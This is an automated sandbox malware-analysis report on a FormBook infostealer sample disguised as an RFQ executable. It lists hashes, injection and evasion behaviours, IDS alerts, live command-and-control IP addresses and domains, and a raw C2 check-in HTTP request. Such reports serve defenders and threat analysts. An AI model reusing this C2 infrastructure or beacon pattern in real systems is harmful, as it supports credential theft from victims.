Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 3100185 MAHAD.exe

Overview

General Information

Sample name:RFQ 3100185 MAHAD.exe
Analysis ID:1559208
MD5:9d6670fbee5ffd65a666a3238db4f622
SHA1:ea392d5a0a4007170be83b4d17ebd6d346b39629
SHA256:4a918ba2805dd458e2b776cae6fd6dd1a2a8ef1c4d8cbd02c2feaa69c49d4367
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ 3100185 MAHAD.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe" MD5: 9D6670FBEE5FFD65A666A3238DB4F622)
    • svchost.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • KOXlLfnDPX.exe (PID: 6672 cmdline: "C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 7968 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • KOXlLfnDPX.exe (PID: 1000 cmdline: "C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.3134906846.00000000049A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.3130699623.0000000000730000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.1518731494.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.3133086926.0000000002E80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.3132982209.0000000002E30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe" , CommandLine: "C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe, NewProcessName: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe, OriginalFileName: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 7968, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe" , ProcessId: 1000, ProcessName: KOXlLfnDPX.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine|base64offset|contains: ]4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ParentImage: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe, ParentProcessId: 7296, ParentProcessName: RFQ 3100185 MAHAD.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ProcessId: 7708, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine|base64offset|contains: ]4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ParentImage: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe, ParentProcessId: 7296, ParentProcessName: RFQ 3100185 MAHAD.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ProcessId: 7708, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:16:57.621627+010020507451Malware Command and Control Activity Detected192.168.2.749894161.97.168.24580TCP
                2024-11-20T10:17:21.888857+010020507451Malware Command and Control Activity Detected192.168.2.74997327.124.4.24680TCP
                2024-11-20T10:17:56.483266+010020507451Malware Command and Control Activity Detected192.168.2.749978149.88.81.19080TCP
                2024-11-20T10:18:10.267272+010020507451Malware Command and Control Activity Detected192.168.2.74998285.159.66.9380TCP
                2024-11-20T10:18:23.635241+010020507451Malware Command and Control Activity Detected192.168.2.749986185.27.134.14480TCP
                2024-11-20T10:18:38.295435+010020507451Malware Command and Control Activity Detected192.168.2.749990172.67.145.23480TCP
                2024-11-20T10:18:52.191366+010020507451Malware Command and Control Activity Detected192.168.2.749994188.114.97.380TCP
                2024-11-20T10:19:05.772813+010020507451Malware Command and Control Activity Detected192.168.2.749998154.88.22.11080TCP
                2024-11-20T10:19:19.101738+010020507451Malware Command and Control Activity Detected192.168.2.750002209.74.77.10780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:16:57.621627+010028554651A Network Trojan was detected192.168.2.749894161.97.168.24580TCP
                2024-11-20T10:17:21.888857+010028554651A Network Trojan was detected192.168.2.74997327.124.4.24680TCP
                2024-11-20T10:17:56.483266+010028554651A Network Trojan was detected192.168.2.749978149.88.81.19080TCP
                2024-11-20T10:18:10.267272+010028554651A Network Trojan was detected192.168.2.74998285.159.66.9380TCP
                2024-11-20T10:18:23.635241+010028554651A Network Trojan was detected192.168.2.749986185.27.134.14480TCP
                2024-11-20T10:18:38.295435+010028554651A Network Trojan was detected192.168.2.749990172.67.145.23480TCP
                2024-11-20T10:18:52.191366+010028554651A Network Trojan was detected192.168.2.749994188.114.97.380TCP
                2024-11-20T10:19:05.772813+010028554651A Network Trojan was detected192.168.2.749998154.88.22.11080TCP
                2024-11-20T10:19:19.101738+010028554651A Network Trojan was detected192.168.2.750002209.74.77.10780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:17:14.191219+010028554641A Network Trojan was detected192.168.2.74997027.124.4.24680TCP
                2024-11-20T10:17:16.685677+010028554641A Network Trojan was detected192.168.2.74997127.124.4.24680TCP
                2024-11-20T10:17:19.232575+010028554641A Network Trojan was detected192.168.2.74997227.124.4.24680TCP
                2024-11-20T10:17:28.936069+010028554641A Network Trojan was detected192.168.2.749974149.88.81.19080TCP
                2024-11-20T10:17:31.498558+010028554641A Network Trojan was detected192.168.2.749975149.88.81.19080TCP
                2024-11-20T10:17:34.060878+010028554641A Network Trojan was detected192.168.2.749976149.88.81.19080TCP
                2024-11-20T10:18:03.248549+010028554641A Network Trojan was detected192.168.2.74997985.159.66.9380TCP
                2024-11-20T10:18:05.795334+010028554641A Network Trojan was detected192.168.2.74998085.159.66.9380TCP
                2024-11-20T10:18:08.467622+010028554641A Network Trojan was detected192.168.2.74998185.159.66.9380TCP
                2024-11-20T10:18:15.987603+010028554641A Network Trojan was detected192.168.2.749983185.27.134.14480TCP
                2024-11-20T10:18:18.527337+010028554641A Network Trojan was detected192.168.2.749984185.27.134.14480TCP
                2024-11-20T10:18:21.096781+010028554641A Network Trojan was detected192.168.2.749985185.27.134.14480TCP
                2024-11-20T10:18:30.626021+010028554641A Network Trojan was detected192.168.2.749987172.67.145.23480TCP
                2024-11-20T10:18:33.219716+010028554641A Network Trojan was detected192.168.2.749988172.67.145.23480TCP
                2024-11-20T10:18:35.759091+010028554641A Network Trojan was detected192.168.2.749989172.67.145.23480TCP
                2024-11-20T10:18:44.381636+010028554641A Network Trojan was detected192.168.2.749991188.114.97.380TCP
                2024-11-20T10:18:46.887428+010028554641A Network Trojan was detected192.168.2.749992188.114.97.380TCP
                2024-11-20T10:18:49.504711+010028554641A Network Trojan was detected192.168.2.749993188.114.97.380TCP
                2024-11-20T10:18:58.111188+010028554641A Network Trojan was detected192.168.2.749995154.88.22.11080TCP
                2024-11-20T10:19:00.671339+010028554641A Network Trojan was detected192.168.2.749996154.88.22.11080TCP
                2024-11-20T10:19:03.219160+010028554641A Network Trojan was detected192.168.2.749997154.88.22.11080TCP
                2024-11-20T10:19:11.426062+010028554641A Network Trojan was detected192.168.2.749999209.74.77.10780TCP
                2024-11-20T10:19:13.995780+010028554641A Network Trojan was detected192.168.2.750000209.74.77.10780TCP
                2024-11-20T10:19:16.522665+010028554641A Network Trojan was detected192.168.2.750001209.74.77.10780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: RFQ 3100185 MAHAD.exeReversingLabs: Detection: 42%
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3134906846.00000000049A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3130699623.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1518731494.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3133086926.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3132982209.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1524405847.0000000007D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3132905244.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1519816258.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: RFQ 3100185 MAHAD.exeJoe Sandbox ML: detected
                Source: RFQ 3100185 MAHAD.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000007.00000003.1487758942.0000000003248000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1487651668.000000000321A000.00000004.00000020.00020000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3131667346.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000007.00000003.1487758942.0000000003248000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1487651668.000000000321A000.00000004.00000020.00020000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3131667346.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KOXlLfnDPX.exe, 0000000A.00000002.3130579724.000000000017E000.00000002.00000001.01000000.00000005.sdmp, KOXlLfnDPX.exe, 0000000C.00000000.1591102432.000000000017E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ 3100185 MAHAD.exe, 00000001.00000003.1288158471.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000001.00000003.1289648146.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1421931899.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1420044435.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.0000000003800000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3133484321.000000000322E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3133484321.0000000003090000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1519099763.0000000002D3F000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1521761752.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ 3100185 MAHAD.exe, 00000001.00000003.1288158471.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000001.00000003.1289648146.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1421931899.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1420044435.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.0000000003800000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 0000000B.00000002.3133484321.000000000322E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3133484321.0000000003090000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1519099763.0000000002D3F000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1521761752.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_007F6CA9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_007F60DD
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_007F63F9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_007FEB60
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FF56F FindFirstFileW,FindClose,1_2_007FF56F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_007FF5FA
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00801B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00801B2F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00801C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00801C8A
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00801F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00801F94
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0074C640 FindFirstFileW,FindNextFileW,FindClose,11_2_0074C640
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then xor eax, eax11_2_00739E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then mov ebx, 00000004h11_2_033E04FE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49894 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49894 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49986 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49982 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49994 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49994 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49982 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49978 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49998 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49998 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49986 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49978 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49973 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49973 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50002 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50002 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49990 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49990 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 209.74.77.107:80
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 85.159.66.93 85.159.66.93
                Source: Joe Sandbox ViewASN Name: SAIC-ASUS SAIC-ASUS
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00804EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00804EB5
                Source: global trafficHTTP traffic detected: GET /xxr1/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65jhjGZAAT78l+Ifn2gDFJzuFUwvVAtXhX1SyzqClfnAxq+DygikL15ul HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
